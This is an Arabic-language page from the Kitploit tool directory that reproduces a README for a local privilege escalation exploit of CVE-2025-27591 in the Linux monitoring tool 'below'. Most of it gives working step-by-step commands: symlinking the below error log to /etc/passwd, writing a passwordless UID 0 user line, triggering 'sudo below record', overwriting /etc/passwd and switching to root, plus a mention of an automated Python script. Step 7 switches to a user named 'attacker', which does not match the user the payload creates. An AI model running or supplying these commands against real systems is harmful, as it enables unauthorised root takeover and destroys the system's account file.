Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Linux-Privilege-Escalation-CVE-2025-27591 — CVE-2025-27591 هي ثغرة معروفة لتصعيد الامتيازات في خدمة Below (الإصدار < v0.9.0) | Kitploit
أدوات/GitHubGitHub/dollarboysushil/linux-privilege-escalation-cve-2025-27591
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubdollarboysushil/linux-privilege-escalation-cve-2025-27591

Linux-Privilege-Escalation-CVE-2025-27591

CVE-2025-27591 هي ثغرة معروفة لتصعيد الامتيازات في خدمة Below (الإصدار < v0.9.0)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
72منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-27591 - تصعيد الامتيازات عبر رابط رمزي قابل للكتابة في below

ملخص

هذا استغلال بسيط لـ CVE-2025-27591، وهي ثغرة تصعيد امتيازات محلية في أداة مراقبة النظام below لنظام لينكس. تؤثر الثغرة على الإصدارات السابقة لـ v0.9.0 وتنبع من تعيينات أذونات غير صحيحة في النظام. تم اكتشاف المشكلة في يناير 2025 والإفصاح عنها علنًا في 12 مارس 2025 (SecurityOnline, OpenWall). عند تشغيل below باستخدام sudo، قد يسجل الأخطاء في دليل قابل للكتابة للجميع (/var/log/below)، مما يسمح للمهاجمين بإنشاء رابط رمزي لملف سجل إلى أهداف حساسة مثل /etc/passwd.

من خلال استغلال هذا، يمكن لمستخدم غير مميز لديه صلاحية sudo لـ below تصعيد الامتيازات إلى الجذر.


تفاصيل الثغرة

  • معرف CVE: CVE-2025-27591
  • الأداة المتأثرة: below
  • الميزة المتأثرة: التسجيل عبر below record
  • المسار المعرض للخطر: /var/log/below/error_root.log
  • متطلبات الهجوم:
    • الدليل /var/log/below قابل للكتابة للجميع
    • يمكن للمهاجم تشغيل sudo /usr/bin/below record بدون كلمة مرور

خطوات الاستغلال (يدوي)

✅ الخطوة 1: التحقق من أن دليل السجلات قابل للكتابة للجميع

يجب أن ترى:

root@kitploit:~
drwxrwxrwx 2 root root 4096 ... /var/log/below

alt text

✅ الخطوة 2: إزالة أي ملف error_root.log موجود

root@kitploit:~
rm -f /var/log/below/error_root.log

✅ الخطوة 3: إنشاء رابط رمزي إلى /etc/passwd

root@kitploit:~
ln -s /etc/passwd /var/log/below/error_root.log

ثم تحقق باستخدام

root@kitploit:~
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

alt text

✅ الخطوة 4: إنشاء ملف حمولة

سيؤدي هذا إلى إضافة مستخدم مهاجم جذر جديد بدون كلمة مرور:

root@kitploit:~
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload

هيكل الملف

root@kitploit:~
username:password:UID:GID:comment(home/full name):home_directory:shell

الشيء الأساسي هنا هو UID و GID

نحن نضبط UID و GUID على 0 مما يجعل المستخدم مستخدم جذر ومعرف المجموعة = مجموعة الجذر

alt text

✅ الخطوة 5: تشغيل كتابة السجل كجذر

هذا هو جوهر الاستغلال.

root@kitploit:~
sudo /usr/bin/below record

من المتوقع أن يفشل هذا الأمر أو ينتهي وقته — لكنه سيحاول كتابة سجلات الأخطاء إلى /var/log/below/error_root.log، وهو في الواقع /etc/passwd.

💡 في بعض الحالات، قد يؤدي هذا وحده إلى إفساد /etc/passwd — لذلك نستبدله بالكامل بعد ذلك.

✅ الخطوة 6: استبدال /etc/passwd عبر الرابط الرمزي

root@kitploit:~
cp /tmp/payload /var/log/below/error_root.log

alt text

✅ الخطوة 7: تصبح جذر

root@kitploit:~
su attacker

ستنتقل إلى قشرة جذر، بدون الحاجة إلى كلمة مرور.

alt text

خطوات الاستغلال (تلقائي)

root@kitploit:~
python3 dbs_exploit.py

alt text

تنزيل الأداة